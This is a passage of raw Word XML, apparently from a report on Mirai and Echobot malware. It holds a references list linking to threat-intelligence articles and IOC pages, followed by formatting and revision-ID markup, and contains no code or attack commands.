          <w:t>https://github.com/alrawi/badthings-tools/tree/master/dynamic_analysis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EC40AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979BD05" w14:textId="35D19012" w:rsidR="00BE0373" w:rsidRDefault="00BE0373" w:rsidP="00BE0373">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc101201927"/>
      <w:r w:rsidRPr="00BE0373">
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="252910ED" w14:textId="38540727" w:rsidR="004C5F2E" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="004C5F2E" w:rsidRPr="00866B97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F336A23" w14:textId="7F22A547" w:rsidR="004C5F2E" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="004C5F2E" w:rsidRPr="00866B97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C5F2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B8868" w14:textId="2D35EF60" w:rsidR="004C5F2E" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="004C5F2E" w:rsidRPr="00866B97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C5F2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D09CC" w14:textId="6476E187" w:rsidR="00313EA6" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00313EA6" w:rsidRPr="00162736">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.radware.com/getattachment/402db7f3-0467-4fa3-bb9a-ae88b728e91b/MiraiHandbookEbookFinal_04.pdf.aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00313EA6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD85D9" w14:textId="38E63D8D" w:rsidR="004C5F2E" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="004C5F2E" w:rsidRPr="00866B97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bleepingcomputer.com/news/security/new-echobot-variant-exploits-77-remote-code-execution-flaws/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C5F2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D409E9" w14:textId="69EB8FC4" w:rsidR="004C5F2E" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="004C5F2E" w:rsidRPr="00866B97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C5F2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF74FA1" w14:textId="2C501FE9" w:rsidR="003C4DFC" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="003C4DFC" w:rsidRPr="00162736">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pastebin.com/raw/JWKpuKid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003C4DFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E4EE9C" w14:textId="2F4BDD4B" w:rsidR="00390FA3" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="00390FA3" w:rsidRPr="00162736">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://linuxhint.com/linux-kernel-watchdog-explained/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00390FA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59723993" w14:textId="77777777" w:rsidR="00F10D6C" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00F10D6C" w:rsidRPr="00162736">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F10D6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E207143" w14:textId="77777777" w:rsidR="00F10D6C" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00F10D6C" w:rsidRPr="00162736">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.subexsecure.com/pdf/malware-reports/June-2020/Linux_Mirai-Backdoor.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F10D6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C754FFB" w14:textId="23513B5A" w:rsidR="00F10D6C" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:anchor="home" w:history="1">
        <w:r w:rsidR="00F10D6C" w:rsidRPr="00162736">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://badthings.info/#home</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F10D6C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5EB772" w14:textId="4DB57898" w:rsidR="00DB2C7F" w:rsidRDefault="00C97199" w:rsidP="007B3210">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00DB2C7F" w:rsidRPr="003B5BC6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/pan-unit42/iocs/blob/master/mirai/ECHOBOT_28thOct2019.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DB2C7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B2C51" w14:textId="36D04908" w:rsidR="00DB2C7F" w:rsidRPr="00DB2C7F" w:rsidRDefault="00DB2C7F" w:rsidP="00DB2C7F"/>
    <w:p w14:paraId="6F8E9723" w14:textId="4C4914BF" w:rsidR="00DB2C7F" w:rsidRDefault="00DB2C7F" w:rsidP="00DB2C7F"/>
    <w:p w14:paraId="498E987F" w14:textId="7E7D2DC1" w:rsidR="00DB2C7F" w:rsidRPr="00DB2C7F" w:rsidRDefault="00DB2C7F" w:rsidP="00DB2C7F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5925"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DB2C7F" w:rsidRPr="00DB2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7FB7" w14:textId="77777777" w:rsidR="00C97199" w:rsidRDefault="00C97199" w:rsidP="004F41C2">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A6D49F2" w14:textId="77777777" w:rsidR="00C97199" w:rsidRDefault="00C97199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0D4E" w14:textId="77777777" w:rsidR="00C97199" w:rsidRDefault="00C97199" w:rsidP="004F41C2">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F545F42" w14:textId="77777777" w:rsidR="00C97199" w:rsidRDefault="00C97199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F1FA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8B0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2A06C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="829E4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36397"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE2C0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9216A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3120F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C156C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0484B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6765DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41ACC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E0D9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BFE4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982392D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49A01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274B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2932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32346"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E708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35197"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="867E1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6473E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD2ED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1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18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6"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="3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0E23"/>
    <w:rsid w:val="000024DB"/>
    <w:rsid w:val="000153C8"/>
    <w:rsid w:val="00015939"/>
    <w:rsid w:val="000206F5"/>
    <w:rsid w:val="00022C0C"/>
    <w:rsid w:val="000262A5"/>
    <w:rsid w:val="00034E7E"/>
    <w:rsid w:val="0003533D"/>
    <w:rsid w:val="000428A7"/>
    <w:rsid w:val="00047950"/>
    <w:rsid w:val="00051CD0"/>
    <w:rsid w:val="00053B02"/>
    <w:rsid w:val="00056436"/>
    <w:rsid w:val="0005685F"/>
    <w:rsid w:val="00060DC3"/>
    <w:rsid w:val="00062EAB"/>
    <w:rsid w:val="000700C0"/>
    <w:rsid w:val="00070FD3"/>
    <w:rsid w:val="00074A3D"/>
    <w:rsid w:val="000751B5"/>
    <w:rsid w:val="00076BFF"/>
    <w:rsid w:val="000771CC"/>
    <w:rsid w:val="000832F2"/>
    <w:rsid w:val="00083DD4"/>
    <w:rsid w:val="00083FF0"/>
    <w:rsid w:val="00090647"/>
    <w:rsid w:val="00090CC6"/>
    <w:rsid w:val="00092B5A"/>
    <w:rsid w:val="000963FA"/>
    <w:rsid w:val="000966E2"/>
    <w:rsid w:val="000A0F19"/>
    <w:rsid w:val="000A1062"/>
    <w:rsid w:val="000A1896"/>
    <w:rsid w:val="000B15B8"/>
    <w:rsid w:val="000B6330"/>
    <w:rsid w:val="000C3C80"/>
    <w:rsid w:val="000C6499"/>
    <w:rsid w:val="000C7198"/>
    <w:rsid w:val="000D11D6"/>
    <w:rsid w:val="000D30FA"/>
    <w:rsid w:val="000D3CC6"/>
    <w:rsid w:val="000E0283"/>
    <w:rsid w:val="000E25C4"/>
    <w:rsid w:val="000E78BF"/>
    <w:rsid w:val="000F0308"/>
    <w:rsid w:val="000F1C6D"/>
    <w:rsid w:val="000F25E1"/>
    <w:rsid w:val="001013CB"/>
    <w:rsid w:val="00101691"/>
    <w:rsid w:val="00101857"/>
    <w:rsid w:val="00101F39"/>
    <w:rsid w:val="001054DA"/>
    <w:rsid w:val="00105D65"/>
    <w:rsid w:val="00106654"/>
    <w:rsid w:val="00107458"/>
    <w:rsid w:val="001106BD"/>
    <w:rsid w:val="00111B4D"/>
    <w:rsid w:val="001131BF"/>
    <w:rsid w:val="00114E62"/>
    <w:rsid w:val="00116B3E"/>
    <w:rsid w:val="00116EA4"/>
    <w:rsid w:val="001221C7"/>
    <w:rsid w:val="00122E7F"/>
    <w:rsid w:val="001256D9"/>
    <w:rsid w:val="00126967"/>
    <w:rsid w:val="00130FD2"/>
    <w:rsid w:val="00133F98"/>
    <w:rsid w:val="001361AE"/>
    <w:rsid w:val="00136201"/>
    <w:rsid w:val="0014028C"/>
    <w:rsid w:val="00147E0D"/>
    <w:rsid w:val="00152B1B"/>
    <w:rsid w:val="00153434"/>
    <w:rsid w:val="00154019"/>
    <w:rsid w:val="001601AE"/>
    <w:rsid w:val="0016217E"/>
    <w:rsid w:val="001641D6"/>
    <w:rsid w:val="00171825"/>
    <w:rsid w:val="001741BB"/>
    <w:rsid w:val="001742C2"/>
    <w:rsid w:val="00177213"/>
    <w:rsid w:val="00180D1D"/>
    <w:rsid w:val="00181FDE"/>
    <w:rsid w:val="001829C6"/>
    <w:rsid w:val="001860BB"/>
    <w:rsid w:val="00186EBB"/>
    <w:rsid w:val="00187E65"/>
    <w:rsid w:val="00190AD4"/>
    <w:rsid w:val="001933A5"/>
    <w:rsid w:val="00193506"/>
    <w:rsid w:val="00193551"/>
    <w:rsid w:val="00194374"/>
    <w:rsid w:val="00195C44"/>
    <w:rsid w:val="00196883"/>
    <w:rsid w:val="001973DB"/>
    <w:rsid w:val="001A1DA8"/>
    <w:rsid w:val="001A4B98"/>
    <w:rsid w:val="001A6D11"/>
    <w:rsid w:val="001B0A5B"/>
    <w:rsid w:val="001B3DC6"/>
    <w:rsid w:val="001B57EF"/>
    <w:rsid w:val="001B5D85"/>
    <w:rsid w:val="001B784B"/>
    <w:rsid w:val="001C140C"/>
    <w:rsid w:val="001C2F14"/>
    <w:rsid w:val="001C3751"/>
    <w:rsid w:val="001C6E3B"/>
    <w:rsid w:val="001E0D31"/>
    <w:rsid w:val="001E0D8A"/>
    <w:rsid w:val="001F2497"/>
    <w:rsid w:val="001F3B7C"/>
    <w:rsid w:val="001F4F1E"/>
    <w:rsid w:val="00200B5E"/>
    <w:rsid w:val="00204CCE"/>
    <w:rsid w:val="00205CE7"/>
    <w:rsid w:val="00210D06"/>
    <w:rsid w:val="00216350"/>
    <w:rsid w:val="00216720"/>
    <w:rsid w:val="00216E3B"/>
    <w:rsid w:val="00220BD7"/>
    <w:rsid w:val="00224482"/>
    <w:rsid w:val="00227353"/>
    <w:rsid w:val="0023754B"/>
    <w:rsid w:val="00252AC3"/>
    <w:rsid w:val="0025579F"/>
    <w:rsid w:val="00255A16"/>
    <w:rsid w:val="00262557"/>
    <w:rsid w:val="00262B61"/>
    <w:rsid w:val="00264314"/>
    <w:rsid w:val="00264CE7"/>
    <w:rsid w:val="002707F3"/>
    <w:rsid w:val="00272DE9"/>
    <w:rsid w:val="00273CB4"/>
    <w:rsid w:val="00275A33"/>
    <w:rsid w:val="00280B2E"/>
    <w:rsid w:val="00283FDE"/>
    <w:rsid w:val="00284E5C"/>
    <w:rsid w:val="002852E4"/>
    <w:rsid w:val="002930BC"/>
    <w:rsid w:val="00293DF7"/>
    <w:rsid w:val="002940BB"/>
    <w:rsid w:val="00295672"/>
    <w:rsid w:val="002A095A"/>
    <w:rsid w:val="002A214D"/>
    <w:rsid w:val="002A3400"/>
    <w:rsid w:val="002A588A"/>
    <w:rsid w:val="002A5A1C"/>
    <w:rsid w:val="002A7C99"/>
    <w:rsid w:val="002B1232"/>
    <w:rsid w:val="002B2B47"/>
    <w:rsid w:val="002B2D6F"/>
    <w:rsid w:val="002B3291"/>
    <w:rsid w:val="002B63DD"/>
    <w:rsid w:val="002C22E0"/>
    <w:rsid w:val="002C29C3"/>
    <w:rsid w:val="002C6B70"/>
    <w:rsid w:val="002D6B1E"/>
    <w:rsid w:val="002E1964"/>
    <w:rsid w:val="002E1CBF"/>
    <w:rsid w:val="002E62FC"/>
    <w:rsid w:val="002E77A7"/>
    <w:rsid w:val="002F06E4"/>
    <w:rsid w:val="002F6C4B"/>
    <w:rsid w:val="003040DC"/>
    <w:rsid w:val="00306F47"/>
    <w:rsid w:val="00310D53"/>
    <w:rsid w:val="0031220A"/>
    <w:rsid w:val="00313EA6"/>
    <w:rsid w:val="00317BF2"/>
    <w:rsid w:val="00320E63"/>
    <w:rsid w:val="00321301"/>
    <w:rsid w:val="00322CFC"/>
    <w:rsid w:val="00323367"/>
    <w:rsid w:val="00326FDD"/>
    <w:rsid w:val="0033044C"/>
    <w:rsid w:val="003338BE"/>
    <w:rsid w:val="00334E02"/>
    <w:rsid w:val="00340B24"/>
    <w:rsid w:val="00340F8F"/>
    <w:rsid w:val="0034293C"/>
    <w:rsid w:val="00342B1C"/>
    <w:rsid w:val="00342E9E"/>
    <w:rsid w:val="00351892"/>
    <w:rsid w:val="0035435B"/>
    <w:rsid w:val="003573D3"/>
    <w:rsid w:val="003610B1"/>
    <w:rsid w:val="00363676"/>
    <w:rsid w:val="00365659"/>
    <w:rsid w:val="00366EF4"/>
    <w:rsid w:val="00367D67"/>
    <w:rsid w:val="00367ECC"/>
    <w:rsid w:val="0037456E"/>
    <w:rsid w:val="00375580"/>
    <w:rsid w:val="003759C3"/>
    <w:rsid w:val="003775FA"/>
    <w:rsid w:val="0038444E"/>
    <w:rsid w:val="003850E2"/>
    <w:rsid w:val="003868E2"/>
    <w:rsid w:val="0038728D"/>
    <w:rsid w:val="00390FA3"/>
    <w:rsid w:val="00393868"/>
    <w:rsid w:val="00394F48"/>
    <w:rsid w:val="003955C1"/>
    <w:rsid w:val="003957D2"/>
    <w:rsid w:val="003A5E89"/>
    <w:rsid w:val="003A5EA6"/>
    <w:rsid w:val="003B5771"/>
    <w:rsid w:val="003B6247"/>
    <w:rsid w:val="003B713B"/>
    <w:rsid w:val="003C0042"/>
    <w:rsid w:val="003C4DFC"/>
    <w:rsid w:val="003C60DD"/>
    <w:rsid w:val="003D15AE"/>
    <w:rsid w:val="003D4110"/>
    <w:rsid w:val="003D5E6F"/>
    <w:rsid w:val="003D7C34"/>
    <w:rsid w:val="003E32DD"/>
    <w:rsid w:val="003E3D53"/>
    <w:rsid w:val="003E4CD2"/>
    <w:rsid w:val="003F2293"/>
    <w:rsid w:val="003F2F32"/>
    <w:rsid w:val="003F6025"/>
    <w:rsid w:val="00400B91"/>
    <w:rsid w:val="0040351E"/>
    <w:rsid w:val="004067D8"/>
    <w:rsid w:val="004105E5"/>
    <w:rsid w:val="00413A6D"/>
    <w:rsid w:val="0041582A"/>
    <w:rsid w:val="00416A22"/>
    <w:rsid w:val="00421C0E"/>
    <w:rsid w:val="00421C49"/>
    <w:rsid w:val="00422002"/>
    <w:rsid w:val="004238BC"/>
    <w:rsid w:val="00423CFF"/>
    <w:rsid w:val="00425168"/>
    <w:rsid w:val="004369B7"/>
    <w:rsid w:val="0043779E"/>
    <w:rsid w:val="0044035A"/>
    <w:rsid w:val="004418C3"/>
    <w:rsid w:val="00441961"/>
    <w:rsid w:val="0044631F"/>
    <w:rsid w:val="00446F53"/>
    <w:rsid w:val="00447363"/>
    <w:rsid w:val="00450198"/>
    <w:rsid w:val="004527BE"/>
    <w:rsid w:val="00453605"/>
    <w:rsid w:val="00457982"/>
    <w:rsid w:val="00463110"/>
    <w:rsid w:val="00464AF8"/>
    <w:rsid w:val="00470902"/>
    <w:rsid w:val="00470EA9"/>
    <w:rsid w:val="004766DC"/>
    <w:rsid w:val="00480917"/>
    <w:rsid w:val="00481662"/>
    <w:rsid w:val="00484C66"/>
    <w:rsid w:val="00485EDB"/>
    <w:rsid w:val="00486A84"/>
    <w:rsid w:val="00486F07"/>
    <w:rsid w:val="004879E0"/>
    <w:rsid w:val="00487FD7"/>
    <w:rsid w:val="0049246B"/>
    <w:rsid w:val="0049508A"/>
    <w:rsid w:val="004951C8"/>
    <w:rsid w:val="004A13D2"/>
    <w:rsid w:val="004B2CD2"/>
    <w:rsid w:val="004B39D7"/>
    <w:rsid w:val="004B584C"/>
    <w:rsid w:val="004B7434"/>
    <w:rsid w:val="004C147B"/>
    <w:rsid w:val="004C1CF5"/>
    <w:rsid w:val="004C27BA"/>
    <w:rsid w:val="004C2EA2"/>
    <w:rsid w:val="004C31EA"/>
    <w:rsid w:val="004C3970"/>
    <w:rsid w:val="004C4464"/>
    <w:rsid w:val="004C51D3"/>
    <w:rsid w:val="004C5F2E"/>
    <w:rsid w:val="004C7768"/>
    <w:rsid w:val="004D1853"/>
    <w:rsid w:val="004E549E"/>
    <w:rsid w:val="004E5DB7"/>
    <w:rsid w:val="004E6D00"/>
    <w:rsid w:val="004E7076"/>
    <w:rsid w:val="004F0E77"/>
    <w:rsid w:val="004F15F2"/>
    <w:rsid w:val="004F17D8"/>
    <w:rsid w:val="004F2B98"/>
    <w:rsid w:val="004F30D0"/>
    <w:rsid w:val="004F41C2"/>
    <w:rsid w:val="004F47DC"/>
    <w:rsid w:val="004F7853"/>
    <w:rsid w:val="0050614C"/>
    <w:rsid w:val="00507E4E"/>
    <w:rsid w:val="00511AF4"/>
    <w:rsid w:val="00515587"/>
    <w:rsid w:val="00521804"/>
    <w:rsid w:val="00532286"/>
    <w:rsid w:val="00535425"/>
    <w:rsid w:val="005376A7"/>
    <w:rsid w:val="005405A7"/>
    <w:rsid w:val="00542A92"/>
    <w:rsid w:val="005445C8"/>
    <w:rsid w:val="005468FD"/>
    <w:rsid w:val="00552304"/>
    <w:rsid w:val="005614C1"/>
    <w:rsid w:val="00562557"/>
    <w:rsid w:val="0056472D"/>
    <w:rsid w:val="00565D5E"/>
    <w:rsid w:val="005672EC"/>
    <w:rsid w:val="00567679"/>
    <w:rsid w:val="005706E8"/>
    <w:rsid w:val="00572432"/>
    <w:rsid w:val="005817C5"/>
    <w:rsid w:val="0058347D"/>
    <w:rsid w:val="005848BC"/>
    <w:rsid w:val="00593B68"/>
    <w:rsid w:val="005A1D32"/>
    <w:rsid w:val="005A21BA"/>
    <w:rsid w:val="005A2C7D"/>
    <w:rsid w:val="005A4499"/>
    <w:rsid w:val="005A463F"/>
    <w:rsid w:val="005A4705"/>
    <w:rsid w:val="005A6D0F"/>
    <w:rsid w:val="005A71B2"/>
    <w:rsid w:val="005B1DBA"/>
    <w:rsid w:val="005B519B"/>
    <w:rsid w:val="005B6225"/>
    <w:rsid w:val="005C14A6"/>
    <w:rsid w:val="005C2F1C"/>
    <w:rsid w:val="005C397F"/>
    <w:rsid w:val="005C45BC"/>
    <w:rsid w:val="005C4662"/>
    <w:rsid w:val="005C5E9A"/>
    <w:rsid w:val="005C7BBB"/>
    <w:rsid w:val="005D0C76"/>
    <w:rsid w:val="005D1A12"/>
    <w:rsid w:val="005D34DC"/>
    <w:rsid w:val="005D3705"/>
    <w:rsid w:val="005E0234"/>
    <w:rsid w:val="005E044F"/>
    <w:rsid w:val="005E2CBB"/>
    <w:rsid w:val="005E4255"/>
    <w:rsid w:val="005E687F"/>
    <w:rsid w:val="005F080E"/>
    <w:rsid w:val="005F3A16"/>
    <w:rsid w:val="0060444A"/>
    <w:rsid w:val="006057D2"/>
    <w:rsid w:val="00610504"/>
    <w:rsid w:val="00611EC8"/>
    <w:rsid w:val="00614C1B"/>
    <w:rsid w:val="006174F6"/>
    <w:rsid w:val="006253C5"/>
    <w:rsid w:val="00632989"/>
    <w:rsid w:val="00633A65"/>
    <w:rsid w:val="006343DF"/>
    <w:rsid w:val="00636375"/>
    <w:rsid w:val="00641873"/>
    <w:rsid w:val="006418AC"/>
    <w:rsid w:val="00643CD6"/>
    <w:rsid w:val="00645252"/>
    <w:rsid w:val="0065068F"/>
    <w:rsid w:val="00652B6A"/>
    <w:rsid w:val="00653E96"/>
    <w:rsid w:val="00656451"/>
    <w:rsid w:val="006565F9"/>
    <w:rsid w:val="006577E2"/>
    <w:rsid w:val="00660510"/>
    <w:rsid w:val="00660D08"/>
    <w:rsid w:val="00666F50"/>
    <w:rsid w:val="006705D4"/>
    <w:rsid w:val="006744E3"/>
    <w:rsid w:val="00674DF6"/>
    <w:rsid w:val="00676547"/>
    <w:rsid w:val="00681164"/>
    <w:rsid w:val="00681724"/>
    <w:rsid w:val="00681AA6"/>
    <w:rsid w:val="0068396B"/>
    <w:rsid w:val="00686237"/>
    <w:rsid w:val="00692086"/>
    <w:rsid w:val="00692D8E"/>
    <w:rsid w:val="0069510F"/>
    <w:rsid w:val="0069670C"/>
    <w:rsid w:val="006A031D"/>
    <w:rsid w:val="006A1F2F"/>
